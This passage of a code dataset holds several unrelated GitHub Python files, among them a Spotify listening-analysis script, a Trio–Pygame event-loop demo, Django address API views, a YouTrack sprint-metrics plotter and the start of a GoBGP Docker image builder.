streaming_size.join(streaming_first_dates)\r\nstreaming_grouped[\"daysSinceFirstPlay\"] = (last_date - streaming_grouped['endTime']).astype('timedelta64[D]')\r\nstreaming_grouped[\"addedToEverything\"] = \"\"\r\nstreaming_grouped[\"combinedArtistSong\"] = streaming_grouped.index\r\nstreaming_grouped = streaming_grouped.reset_index(drop=True)\r\n\r\nstart_time = time.time()\r\ntoken = util.prompt_for_user_token(username, scope, client_id = client_id, client_secret = client_secret, redirect_uri = redirect_uri)\r\nsp = spotipy.Spotify(auth=token)\r\n\r\nuri_df = pd.DataFrame([])\r\nfor song in range(len(streaming_grouped)):\r\n try:\r\n track_info = pd.DataFrame([])\r\n comb_artist_song = streaming_grouped.at[song, \"combinedArtistSong\"]\r\n artist = streaming_grouped.at[song, \"artistName\"]\r\n track = streaming_grouped.at[song, \"trackName\"]\r\n if playlist_songs[\"combinedArtistSong\"].str.contains(re.escape(comb_artist_song)).any():\r\n streaming_grouped.at[song, \"addedToEverything\"] = 1\r\n else:\r\n streaming_grouped.at[song, \"addedToEverything\"] = 0\r\n searchResults = sp.search(q=\"artist:\" + artist + \" track:\" + track, type=\"track\", market=\"AU\")\r\n try:\r\n uri = searchResults['tracks']['items'][0].get('uri')\r\n track_info = pd.DataFrame(sp.audio_features(uri)[0], index=[song])\r\n track_info['track_image'] = sp.track(uri, market='AU')['album']['images'][0]['url']\r\n track_info['track_url'] = sp.track(uri, market='AU')['external_urls']['spotify']\r\n except:\r\n uri = \"NaN\"\r\n track_info = pd.DataFrame(sp.audio_features(uri)[0], index=[song])\r\n uri_df = pd.concat([uri_df, track_info], axis = 0)\r\n except:\r\n token = util.prompt_for_user_token(username, scope, client_id=client_id, client_secret=client_secret, redirect_uri=redirect_uri)\r\n sp = spotipy.Spotify(auth=token)\r\n track_info = pd.DataFrame([])\r\n comb_artist_song = 
streaming_grouped.at[song, \"combinedArtistSong\"]\r\n artist = streaming_grouped.at[song, \"artistName\"]\r\n track = streaming_grouped.at[song, \"trackName\"]\r\n if playlist_songs[\"combinedArtistSong\"].str.contains(re.escape(comb_artist_song)).any():\r\n streaming_grouped.at[song, \"addedToEverything\"] = 1\r\n else:\r\n streaming_grouped.at[song, \"addedToEverything\"] = 0\r\n searchResults = sp.search(q=\"artist:\" + artist + \" track:\" + track, type=\"track\", market=\"AU\")\r\n try:\r\n uri = searchResults['tracks']['items'][0].get('uri')\r\n track_info = pd.DataFrame(sp.audio_features(uri)[0], index=[song])\r\n track_info['track_image'] = sp.track(uri, market='AU')['album']['images'][0]['url']\r\n track_info['track_url'] = sp.track(uri, market='AU')['external_urls']['spotify']\r\n except:\r\n uri = \"NaN\"\r\n track_info = pd.DataFrame(sp.audio_features(uri)[0], index=[song])\r\n uri_df = pd.concat([uri_df, track_info], axis = 0)\r\n\r\nstreaming_grouped = pd.concat([streaming_grouped, uri_df], axis = 1)\r\nstreaming_grouped = streaming_grouped.dropna()\r\n\r\nuser_info = sp.user(username)\r\nusername = user_info['display_name']\r\nuser_url = user_info['external_urls']['spotify']\r\n\r\nmisc_info = {\"username\": username, \"user_url\": user_url}\r\nmisc_info = pd.DataFrame([misc_info])\r\n\r\n#TODO Power BI add current song playing\r\nimport spotipy\r\nimport spotipy.util as util\r\n\r\n#Authentication\r\nclient_id = 'XXXXXXX'\r\nclient_secret = 'XXXXXXX'\r\nusername = \"griffin_sleigh\"\r\nscope = \"user-read-currently-playing user-read-recently-played\"\r\nredirect_uri = \"http://localhost:8888/callback/\"\r\n\r\ntoken = util.prompt_for_user_token(username, scope, client_id = client_id, client_secret = client_secret, redirect_uri = redirect_uri)\r\nsp = spotipy.Spotify(auth=token)\r\n\r\ntry:\r\n currently_playing = sp.currently_playing()\r\n misc_info[\"currently_playing_uri\"] = currently_playing[\"item\"][\"uri\"]\r\n misc_info[\"currently_playing_image\"] = currently_playing[\"item\"][\"album\"][\"images\"][0][\"url\"]\r\n misc_info[\"currently_playing_artist\"] = currently_playing[\"item\"][\"artists\"][0][\"name\"]\r\n misc_info[\"currently_playing_song\"] = currently_playing[\"item\"][\"name\"]\r\n misc_info[\"currently_playing_song_link\"] = currently_playing[\"item\"][\"external_urls\"][\"spotify\"]\r\n misc_info[\"play_status\"] = \"Currently Playing\"\r\nexcept:\r\n currently_playing = sp.current_user_recently_played(limit=1)\r\n misc_info[\"currently_playing_uri\"] = currently_playing['items'][0]['track'][\"uri\"]\r\n misc_info[\"currently_playing_image\"] = currently_playing['items'][0]['track'][\"album\"][\"images\"][0][\"url\"]\r\n misc_info[\"currently_playing_artist\"] = currently_playing['items'][0]['track'][\"artists\"][0][\"name\"]\r\n misc_info[\"currently_playing_song\"] = currently_playing['items'][0]['track'][\"name\"]\r\n misc_info[\"currently_playing_song_link\"] = currently_playing['items'][0]['track'][\"external_urls\"][\"spotify\"]\r\n misc_info[\"play_status\"] = \"Last Played\"\r\n\r\n\r\n#Connecting to MySQL to export\r\nsqlEngine = sqlalchemy.create_engine('XXXXXXX')\r\ndbConnection = sqlEngine.connect()\r\nframe = streaming_grouped.to_sql(\"streaming\", dbConnection, if_exists='replace', index=False)\r\nframe_2 = playlist_songs.to_sql(\"playlist_songs\", dbConnection, if_exists='replace', index=False)\r\nframe_3 = misc_info.to_sql(\"misc_info\", dbConnection, if_exists='replace', index=False)\r\n\r\nprint((time.time() - 
start_time)/60)\r\n\r\n#Import from SQL\r\n\r\nimport mysql.connector as connection\r\ntry:\r\n mydb = connection.connect(host=\"XXXXXXX\", database = 'XXXXXXX',user=\"XXXXXXX\", passwd=\"XXXXXXX\",use_pure=True)\r\n query = \"Select * from streaming;\"\r\n streaming_grouped = pd.read_sql(query,mydb)\r\n query = \"Select * from playlist_songs;\"\r\n playlist_songs = pd.read_sql(query,mydb)\r\n mydb.close() #close the connection\r\nexcept Exception as e:\r\n mydb.close()\r\n print(str(e))\r\n \r\n#PREDICTION FOR WITHIN THE DASHBOARD\r\n\r\nfrom sklearn import preprocessing\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels.api as sm\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn import metrics\r\nfrom sklearn import tree\r\n\r\n#DATASETS\r\ny = pd.DataFrame(streaming_grouped['addedToEverything'])\r\ny = y.astype('int')\r\nx = streaming_grouped[['tempo', 'loudness', 'speechiness', 'acousticness', 'instrumentalness', 'liveness', 'valence', 'danceability', 'energy']]\r\nfeature_cols = ['tempo', 'loudness', 'speechiness', 'acousticness', 'instrumentalness', 'liveness', 'valence', 'danceability', 'energy']\r\nclass_names = ['Not', 'Added']\r\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=1) # 70% training and 30% test\r\n\r\n#DECISION TREE\r\nclf = DecisionTreeClassifier(criterion='entropy', max_depth=10)\r\nclf = clf.fit(x_train, y_train)\r\ny_pred = clf.predict(x_test)\r\nprint(\"Accuracy:\", metrics.accuracy_score(y_test, y_pred))\r\ncnf_matrix_dt = metrics.confusion_matrix(y_test, y_pred)\r\n# Setting dpi = 300 to make image clearer than default\r\nfig, axes = plt.subplots(nrows = 1,ncols = 1,figsize = (4,4), dpi=600)\r\n\r\ntree.plot_tree(clf,\r\n feature_names = feature_cols,\r\n class_names= class_names,\r\n filled = True);\r\n\r\nfig.savefig('imagename.png')\r\n\r\n#LOGISTIC REGRESSION - CHANGE X BUT KEEP Y THE SAME\r\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\r\n# VIF dataframe\r\nvif_data = pd.DataFrame()\r\nvif_data[\"feature\"] = x.columns\r\n# calculating VIF for each feature\r\nvif_data[\"VIF\"] = [variance_inflation_factor(x.values, i)\r\n for i in range(len(x.columns))]\r\n\r\n\r\nlogreg = LogisticRegression(fit_intercept=True)\r\nlogreg.fit(x_train,y_train)\r\ny_pred=logreg.predict(x_test)\r\ncnf_matrix = metrics.confusion_matrix(y_test, y_pred)\r\nlogsm = sm.Logit(y_train, x_train).fit()\r\nprint(\"Accuracy:\",metrics.accuracy_score(y_test, y_pred))\r\n\r\n#K-NEAREST NEIGHBOURS\r\nknn = KNeighborsClassifier(n_neighbors=25)\r\nknn.fit(x_train, y_train)\r\ny_pred = knn.predict(x_test)\r\nprint(\"Accuracy:\", metrics.accuracy_score(y_test, y_pred))\r\n\r\n","repo_name":"gsleigh24/Portfolio","sub_path":"Spotify Data.py","file_name":"Spotify Data.py","file_ext":"py","file_size_in_byte":12683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11687917496","text":"from foo import system\n\nif system.get_os() == \"Windows\":\n from win32event import CreateMutex\n from win32api import CloseHandle, GetLastError\n from winerror import ERROR_ALREADY_EXISTS\nelse:\n import os, commands\n\nclass SingleInstance(object):\n\n def __init__(self):\n self.last_error = False\n\n if system.get_os() == \"Windows\":\n self.mutex_name = 'foo_{D0E858DF-985E-4907-B7FB-8D732C3FC3B9}'\n 
self.mutex = CreateMutex(None, False, self.mutex_name)\n self.last_error = GetLastError()\n else:\n self.pid_path = '/tmp/foo.pid'\n if os.path.exists(self.pid_path):\n pid = open(self.pid_path, 'r').read().strip()\n pid_running = commands.getoutput('ls /proc | grep %s' % pid)\n\n if pid_running:\n self.last_error = True\n\n if not self.last_error:\n f = open(self.pid_path, 'w')\n f.write(str(os.getpid()))\n f.close()\n\n def is_running(self):\n if system.get_os() == \"Windows\":\n return (self.last_error == ERROR_ALREADY_EXISTS)\n else:\n return self.last_error\n\n def __del__(self):\n if system.get_os() == \"Windows\":\n if self.mutex:\n CloseHandle(self.mutex)\n else:\n if not self.last_error:\n os.unlink(self.pid_path)\n","repo_name":"wiliamsouza/playground","sub_path":"singleinstance.py","file_name":"singleinstance.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"41169908440","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\nfrom UI_instance.UI_Model.GiiaGraphicsScene import GiiaGraphicsScene\nfrom config.defaults import *\n\n\nclass GraphicsView(QGraphicsView):\n def __init__(self,parent=None):\n super(GraphicsView, self).__init__(parent=parent)\n self.scene=None\n self.guideLinePen=QPen()\n self.cursorPos=QPointF()\n self.skipMode=False\n def setScene(self, scene: GiiaGraphicsScene):\n self.scene=scene\n super(GraphicsView, self).setScene(scene)\n self.guideLinePen.setWidth(0)\n self.guideLinePen.setBrush(Qt.black)\n def setSkipMode(self,value:bool):\n self.skipMode=value\n self.scene.update()\n def setGuideLineColor(self,color:QColor):\n self.guideLinePen.setColor(color)\n def paintEvent(self, event: QPaintEvent):\n super(GraphicsView, self).paintEvent(event)\n ptr=QPainter(self.viewport())\n ptr.setPen(self.guideLinePen)\n cursorPos=self.scene.cursorPosition()\n #print(cursorPos)\n cursorPos=self.mapFromScene(cursorPos)\n if self.scene.isMarking():\n #print(\"marking\")\n lastCursorPos=self.scene.lastCursorPosition()\n lastCursorPos=self.mapFromScene(lastCursorPos)\n #print(lastCursorPos)\n #print(cursorPos)\n ptr.drawRect(QRectF(lastCursorPos,cursorPos).normalized())\n elif self.scene.isMoving():\n pass\n #print(\"moving\")\n else:\n ptr.drawLine(0, cursorPos.y(), self.width(), cursorPos.y());\n ptr.drawLine(cursorPos.x(), 0, cursorPos.x(), self.height());\n if self.skipMode:\n ptr.setRenderHints(self.renderHints())\n brush=QBrush(Qt.yellow)\n brush.setStyle(Qt.BDiagPattern)\n ptr.setBrush(brush)\n ptr.drawRect(0,0,self.width(),self.height())","repo_name":"generalized-intelligence/TeguAnnotation","sub_path":"src/UI_instance/UI_Model/GraphicsView.py","file_name":"GraphicsView.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34633423728","text":"# INFORMATION\n# This script is intended to show the correlation of resolved bugs/tasks to the created ones per indicated periods.\n# The statistics is shown for P1, P2, P3 and all mentioned priorities together and demostrated in 4 histograms.\n# For correct script operation the following modules should be installed via 'pip install' if necessary: matplotlib, requests, time, datetime, numpy, sys.\n\n# Minimum number of arguments is 4:\n# 1 - Newest sprint number\n# 2- Oldest sprint number\n# 3 - Starting date of at least one period (sprint)\n# 4 - Ending date of at least one period 
(sprint)\n\n# Maximum number of date pairs is 8.\n\nimport matplotlib as mp\nimport requests\nimport time\nimport datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\n################\n### VIRABLES ###\ni_SprintsCount = 0\ni_PrioritiesCount = 3\ni_WorkingDay = 480 # one working day in minutes, 60 * 8 hours\n\n#####################\n### Authorization ###\nyt_url = '' # CADEX server api here\nyt_user = input('Login: ')\nyt_pass = input('Password: ')\nyt_auth = (yt_user, yt_pass)\n\n###################\n### Enter dates ###\ni_ArgCount = len(sys.argv)\ni_SprintNum = 1\nb_GetStartDate = True\nb_GetEndDate = False\n\nstr_Instructions = \"\"\"\n*** Instructions ***\n\nMinimum number of arguments is 4:\n1 - Newest sprint number\n2- Oldest sprint number\n3 - Starting date of at least one period (sprint)\n4 - Ending date of at least one period (sprint)\n\nMaximum number of date pairs is 8.\nThe following modules should be installed via 'pip install' if necessary: matplotlib, requests, time, datetime, numpy, sys.\n\n*** End ***\"\"\"\n\nif sys.argv[0] == 'instr':\n print(str_Instructions)\n sys.exit()\nelse:\n if i_ArgCount < 4 or (i_ArgCount % 2) == 0:\n print(str_Instructions)\n sys.exit()\n else: \n for i in range(i_ArgCount):\n if i < 3:\n if i == 0:\n continue\n elif i == 1:\n i_NewestSprint = int(sys.argv[i])\n elif i == 2:\n i_OldestSprint = int(sys.argv[i])\n elif i >= 3:\n if b_GetStartDate == True:\n globals()[f\"str_inputDateStart_S{i_SprintNum}\"] = sys.argv[i]\n b_GetStartDate = False\n b_GetEndDate = True\n elif b_GetEndDate == True:\n globals()[f\"str_inputDateEnd_S{i_SprintNum}\"] = sys.argv[i]\n b_GetStartDate = True\n b_GetEndDate = False\n i_SprintsCount += 1\n i_SprintNum += 1\n\n#############################\n### YouTrack bugs request ###\nstr_bugsQuery = ''\n\ndef Calc_FlowEff(dateStart, dateEnd, priority):\n #################### \n ### Get requests ###\n list_Issues = []\n dates = dateStart + ' .. 
' + dateEnd + ' '\n issues_params = {'fields': 'idReadable,customFields(name,value(name))',\n 'query': 'resolved date: ' + dates + str_bugsQuery + 'State: -Rejected ' + 'Priority: P' + priority}\n\n request = requests.get(yt_url + 'issues', auth=yt_auth, params=issues_params)\n if (not request.ok):\n print(request.json(), file=sys.stderr)\n sys.exit(1)\n\n list_Issues.extend(request.json())\n\n ######################################### \n ### Calculate average flow efficiency ###\n list_FlowEffs = []\n activities_params = {'fields': 'added(name),removed(name),timestamp,field(name),author(fullName)',\n 'categories': 'CustomFieldCategory,IssueCreatedCategory,IssueResolvedCategory'}\n\n for issue in list_Issues:\n b_ResolvedDateActFound = False\n b_SpentTimeActFound = False\n\n ## Get activities\n requestActivities = requests.get(yt_url + 'issues/{}/activities'.format(issue['idReadable']), auth=yt_auth, params=activities_params)\n activities_chunk = requestActivities.json()\n\n ## Go through each list of activities\n for item in reversed(activities_chunk):\n i_WhenWasCreated = activities_chunk[0]['timestamp'] # date of creation\n\n if b_ResolvedDateActFound == False:\n # Find Resolved Date activity\n if item['field']['name'] == 'resolved date':\n i_WhenWasResolved = item['timestamp'] # when was resolved\n b_ResolvedDateActFound = True # found\n\n # Find Spent time\n if b_SpentTimeActFound == False:\n if item['field']['name'] == 'Spent Time':\n i_SpentTime = item['added'] # total time spent on task in MINUTES\n b_SpentTimeActFound = True # found\n\n # When Spent time and Resolved date found, CALCULATE FLOW EFFICIENCY\n if b_ResolvedDateActFound == True and b_SpentTimeActFound == True:\n # Date of creation\n dt_Create = datetime.datetime.fromtimestamp(i_WhenWasCreated / 1e3)\n d_createdDate = datetime.date(dt_Create.year, dt_Create.month, dt_Create.day)\n\n # Date of close\n dt_Resolved = datetime.datetime.fromtimestamp(i_WhenWasResolved / 1e3)\n d_resolvedDate = datetime.date(dt_Resolved.year, dt_Resolved.month, dt_Resolved.day)\n\n i_NumOfBusDays = np.busday_count(d_createdDate, d_resolvedDate) # consider only working days\n # If i_NumOfBusDays = 0, divide by (dt_Resolved - dt_Create)\n # If i_NumOfBusDays > 0, divide by Working days\n if i_NumOfBusDays > 0:\n f64_FlowEff = (i_SpentTime/(i_NumOfBusDays*i_WorkingDay))*100 # CALCULATE FLOW EFFICIENCY (FE)\n elif i_NumOfBusDays == 0:\n length = dt_Resolved - dt_Create # period from Created to Resolved\n f64_FlowEff = (i_SpentTime/(length.seconds/60))*100 # CALCULATE FLOW EFFICIENCY (FE)\n list_FlowEffs.append(f64_FlowEff) # add one Flow Eff\n break\n \n if len(list_FlowEffs) > 0:\n f64_AvFlowEff = round((sum(list_FlowEffs) / len(list_FlowEffs)), 1)\n else:\n f64_AvFlowEff = np.nan\n\n return f64_AvFlowEff\n\n## Get lists Flow Efficiencies per sprints\ni_Priority = 0\ni_Sprint = 0\nlist_FlowEffP0 = []; list_FlowEffP1 = []; list_FlowEffP2 = []\nwhile i_Sprint != i_SprintsCount:\n i_Sprint += 1\n while i_Priority != i_PrioritiesCount:\n globals()[f\"list_FlowEffP{i_Priority}\"].append(Calc_FlowEff(globals()[f\"str_inputDateStart_S{i_Sprint}\"], \n globals()[f\"str_inputDateEnd_S{i_Sprint}\"], str(i_Priority)))\n i_Priority += 1\n i_Priority = 0\n\n################\n### Graphics ###\n## Set sprints numbers\nlist_SpintsNums = []\nif i_NewestSprint > i_OldestSprint:\n list_SpintsNums = [i for i in range(i_NewestSprint, i_OldestSprint-1, -1)]\nelif i_NewestSprint < i_OldestSprint:\n list1 = [i for i in range(i_NewestSprint, 0, -1)]\n list2 = [i for i 
in range(8, i_OldestSprint-1, -1)]\n list_SpintsNums = list1 + list2\n\n## Lines loop\nfig = plt.figure(figsize=(2.375*i_SprintsCount, 8))\n\n## Misc\nplt.grid(axis='y') # set grid\nplt.locator_params(axis='y', integer=True) # only integers on Y axes\n\n## Set axis bin names\nX_P = [globals()[f\"str_inputDateStart_S{i+1}\"][0:4]+'_S'+str(list_SpintsNums[i]) for i in range(i_SprintsCount)]\n\n## Set limits\nplt.xlim(-0.5, float(i_SprintsCount)-0.5)\n\n## Format ticks\nplt.tick_params(direction='inout', length=8, width=1)\nplt.xticks(fontsize=14)\nplt.yticks(fontsize=14)\n\n## Format tick name weight for 1st sprint in year\nn = -1 # number of 1st sprint\n# Find tick\nfor name in reversed(X_P):\n n += 1\n if name[-1] == '1':\n # Format tick name\n plt.gca().get_xticklabels()[n].set_weight(\"bold\")\n break\n\n## Labels\nx = np.arange(len(X_P)) \nwidth = 0.25 # the width of the bars\nplt.gca().set_xticks(x, reversed(X_P)) # set tasks names\n\n## Bars\nrectsP0 = plt.bar((x-width)-(width/2), list(reversed(list_FlowEffP0)), width, align='edge', color = 'r', label='P0')\nrectsP1 = plt.bar(x-(width/2), list(reversed(list_FlowEffP1)), width, align='edge', color = '#FFD700', label='P1')\nrectsP2 = plt.bar((x+width)-(width/2), list(reversed(list_FlowEffP2)), width, align='edge', color = '#228B22', label='P2')\nplt.bar_label(rectsP0, padding=3.0, fontsize = 12)\nplt.bar_label(rectsP1, padding=3.0, fontsize = 12)\nplt.bar_label(rectsP2, padding=3.0, fontsize = 12)\n\n## Titles\nplt.xlabel('Sprints', fontsize=20, fontweight='bold', style='italic') \nplt.ylabel('Flow efficiency, %', fontsize=20, fontweight='bold', style='italic')\nfig.suptitle('Average flow efficiency', fontsize=26, fontweight='bold')\n\n## Legend\nplt.legend(loc='upper center', bbox_to_anchor=(0.0, 0.05, 1.0, -0.15), \n ncol=3, fontsize=14, edgecolor='black', handletextpad=0.25)\n\n## Saving the plot as an image\nfig.tight_layout()\nfig.subplots_adjust(wspace=0.1825, hspace=0.3)\nfig.savefig('Average flow efficiency.png', bbox_inches='tight', dpi=150)\n\nprint('--- *** Successfully *** ---')","repo_name":"evgeniyzaitsev92/portfolio","sub_path":"Python/Scripts/Success metrics/flow_efficiency_average_per_sprints.py","file_name":"flow_efficiency_average_per_sprints.py","file_ext":"py","file_size_in_byte":9029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16613213261","text":"import traceback\n\nimport trio\nimport pygame\nfrom outcome import Error\n\nimport example_tasks\n\n\nclass PygameHost:\n def __init__(self, app):\n self.app = app\n\n def run_sync_soon_threadsafe(self, func):\n \"\"\"Use Pygame/SDL fastevent.post to schedule a function call\n\n The fastevent library runs a (busy?) loop trying to re-post the events if the\n queue is full, so it can result in deadlocks if called from the main thread.\n In other words, unthreaded unsafe? 
so we must implement run_sync_soon_not_threadsafe.\n \"\"\"\n # internal convention: put it in the event __dict__ under the name \"thunk\"\n event = pygame.event.Event(pygame.USEREVENT, thunk=func)\n pygame.fastevent.post(event)\n\n def run_sync_soon_not_threadsafe(self, func):\n \"\"\"Use Pygame/SDL event.post to schedule a function call\n\n The event queue is of finite size so for now we crash hard when that fills.\n It would be possible to make an unbounded queue for this edge case, or print\n warnings and continue while losing events, but it seems more prudent to\n just try to keep the event queue empty.\n\n Open question: can we use event.post with fastevent? the code seems that way.\n\n raises pygame.error\n \"\"\"\n # internal convention: put it in the event __dict__ under the name \"thunk\"\n event = pygame.event.Event(pygame.USEREVENT, thunk=func)\n pygame.event.post(event)\n\n def done_callback(self, outcome):\n \"\"\"non-blocking request to end the main loop\n \"\"\"\n print(f\"Outcome: {outcome}\")\n if isinstance(outcome, Error):\n exc = outcome.error\n traceback.print_exception(type(exc), exc, exc.__traceback__)\n self.app.quit()\n\n def mainloop(self):\n self.app.mainloop()\n\n\nclass PygameDisplay:\n def __init__(self, app):\n self.app = app\n self.screen = pygame.display.set_mode((640, 480))\n self.screen.fill((30, 30, 30))\n self.font = pygame.font.SysFont('Sans', 30)\n cancelsurf = self.font.render('Cancel', True, (0, 0, 0))\n self.button_rect = pygame.Rect((235, 350), (170, 80))\n self.screen.fill((128, 128, 128), self.button_rect)\n self.screen.blit(cancelsurf, (280, 370))\n self.pbar_rect = pygame.Rect((20, 20), (600, 200))\n self.screen.fill((0, 128, 0), self.pbar_rect)\n self.maximum = 1\n\n def set_title(self, title):\n pygame.display.set_caption(title)\n\n def set_max(self, maximum):\n self.maximum = maximum\n\n def set_value(self, downloaded):\n progress_ticks = 600 * downloaded // self.maximum\n progress_rect = pygame.Rect((20, 20), (progress_ticks, 200))\n self.screen.fill((0, 255, 0), progress_rect)\n percentsurf = self.font.render(str(100 * downloaded // self.maximum) + '%', True, (255,) * 3, (20,) * 3)\n self.screen.blit(percentsurf, (300, 250))\n\n def set_cancel(self, fn):\n self.app.register_mouse_cb(fn, self.button_rect)\n self.app.register_quit_cb(fn)\n\n\n# I know it's rare to put a simple pygame app into a class but I wanted to match the program structure of the others\nclass PygameApp:\n def __init__(self):\n pygame.display.init()\n pygame.fastevent.init()\n pygame.font.init()\n self.running = False\n self._mouse_cbs = []\n self._quit_cb = self.quit\n\n def mainloop(self):\n self.running = True\n while self.running:\n for event in pygame.fastevent.get():\n # print(event)\n if event.type == pygame.QUIT:\n self._quit_cb()\n elif event.type == pygame.MOUSEBUTTONUP:\n self._mouse_callback(event.pos, event.button)\n elif event.type == pygame.USEREVENT:\n event.thunk() # don't forget to add some ifs here if other USEREVENTS appear\n else:\n pass\n # print('unused event:', event)\n pygame.display.flip()\n pygame.quit()\n\n def _mouse_callback(self, pos, button):\n for cb in self._mouse_cbs:\n cb(pos, button)\n\n def register_mouse_cb(self, fn, rect, button=1):\n\n def mouse_wrapper(pos, _button):\n if rect.collidepoint(pos) and button == _button:\n fn()\n\n self._mouse_cbs.append(mouse_wrapper)\n\n def register_quit_cb(self, fn):\n self._quit_cb = fn\n\n def quit(self):\n self.running = False\n\n\ndef main(task):\n app = PygameApp()\n host = 
PygameHost(app)\n display = PygameDisplay(app)\n trio.lowlevel.start_guest_run(\n task,\n display,\n run_sync_soon_threadsafe=host.run_sync_soon_threadsafe,\n run_sync_soon_not_threadsafe=host.run_sync_soon_not_threadsafe,\n done_callback=host.done_callback,\n )\n host.mainloop()\n\n\nif __name__ == '__main__':\n main(example_tasks.count)\n","repo_name":"richardsheridan/trio-guest","sub_path":"trio_guest_pygame.py","file_name":"trio_guest_pygame.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"42802905212","text":"import gi\nimport logging\nfrom do_changes import *\ngi.require_version('GExiv2', '0.10')\nfrom gi.repository import GExiv2\n\n\nsearch_person_tags = [('Xmp.mwg-rs.Regions/mwg-rs:RegionList[', ']/mwg-rs:Name'),\n ('Xmp.MP.RegionInfo/MPRI:Regions[', ']/MPReg:PersonDisplayName')]\n\n\ndef _transfer_tags(current_file, metadata):\n if metadata.has_tag('Iptc.Application2.Keywords'):\n person_names = set(metadata.get_tag_multiple('Iptc.Application2.Keywords'))\n else:\n person_names = set()\n original_person_names = set(person_names)\n for person_num in range(1, 1000):\n for tag_begin, tag_end in search_person_tags:\n current_tag = tag_begin + str(person_num) + tag_end\n if metadata.has_tag(current_tag):\n current_person_name = metadata[current_tag]\n if current_person_name not in original_person_names:\n logging.info('%s = %s', str(person_num), current_person_name)\n person_names.add(current_person_name)\n if len(person_names) > len(original_person_names):\n if DO_CHANGES:\n metadata.set_tag_multiple('Iptc.Application2.Keywords', list(person_names))\n metadata.save_file()\n logging.info(\"%s ... face tags copied from XMP to IPTC\", current_file)\n\n\ndef transfert_picasa_to_piwigo_face_tags(current_file):\n metadata = GExiv2.Metadata(str(current_file))\n has_face_tags = False\n for tag_begin, tag_end in search_person_tags:\n if metadata.has_tag(tag_begin + '1' + tag_end):\n has_face_tags = True\n break\n if has_face_tags:\n _transfer_tags(current_file, metadata)\n","repo_name":"esppat/updatePiwigo","sub_path":"face_tags.py","file_name":"face_tags.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36537378737","text":"from .models import Address\nfrom .serializers import AddressSerializer\nfrom django.http import Http404,HttpResponse\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nclass AddressApiView(APIView):\n def get(self, request, pk, format=None):\n ad = Address.objects.filter(pk = pk).first()\n if ad:\n serializer = AddressSerializer(ad)\n return Response(serializer.data)\n return Response('No such address in address book exists kindly check id/pk')\n\n def post(self, request,pk, format=None):\n serializer = AddressSerializer(data=request.data,partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(\n data=serializer.data,\n status=status.HTTP_201_CREATED\n )\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST\n )\n\n def patch(self, request,pk, format=None):\n obj = Address.objects.filter(pk=pk).first()\n if obj: \n serializer = AddressSerializer(obj,data=request.data,partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(\n data=serializer.data\n )\n return Response(\n data=serializer.errors,\n 
status=status.HTTP_400_BAD_REQUEST\n )\n return Response('No such address in address book exists kindly check id/pk')\n\n def delete(self,request,pk, format=None):\n obj = Address.objects.filter(pk=pk).first()\n obj.delete()\n return Response(\n status=status.HTTP_204_NO_CONTENT\n )\n\nclass NearByAddressApiView(APIView):\n def get(self, request, format=None):\n aid = request.GET.get('aid',None)\n print(aid)\n ad = Address.objects.filter(id=aid).first()\n if ad:\n obj = Address.objects.filter(latitude__lte=ad.latitude+1,latitude__gte=ad.latitude-1,longitude__lte=ad.longitude+1,longitude__gte=ad.longitude-1)\n print(obj)\n if obj:\n serializer = AddressSerializer(obj,many=True)\n return Response(serializer.data)\n return Response('No such address in address book exists with nearby coordinates')\n\nclass AllAddressApiView(APIView):\n def get(self, request, format=None):\n obj = Address.objects.all().order_by('city')\n serializer = AddressSerializer(obj,many=True)\n return Response(\n data=serializer.data\n )","repo_name":"sakshampathak1508/EastVantage-Task","sub_path":"addressbook/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10499324677","text":"import sys\nimport traceback\n\nx = 10\ny = int(input('請輸入數字:'))\ntry:\n z = x / y\n print(z)\n#except:\n print('錯誤!錯誤!')\n\nexcept Exception as e:\n print('錯誤!錯誤!', e)\n print(e.__class__.__name__)\n cl, exc, tb = sys.exc_info()\n lastCallStack = traceback.extract_tb(tb)[-1]\n print(lastCallStack) # 可抓出哪裡有錯,detail information\nelse:\n print(z)","repo_name":"tina8860035/yzu_python","sub_path":"Lesson08/exception/ExceptDemo1.py","file_name":"ExceptDemo1.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23658627314","text":"from base import *\n\nclass GoBGP(Container):\n\n CONTAINER_NAME = None\n GUEST_DIR = '/root/config'\n\n def __init__(self, host_dir, conf, image='bgperf/gobgp'):\n super(GoBGP, self).__init__(self.CONTAINER_NAME, image, host_dir, self.GUEST_DIR, conf)\n\n @classmethod\n def build_image(cls, force=False, tag='bgperf/gobgp', checkout='HEAD', nocache=False):\n cls.dockerfile = '''\nFROM golang:1.6\nWORKDIR /root\nRUN go get -v github.com/osrg/gobgp/gobgpd\nRUN go get -v github.com/osrg/gobgp/gobgp\nRUN cd $GOPATH/src/github.com/osrg/gobgp && git checkout {0}\nRUN go install 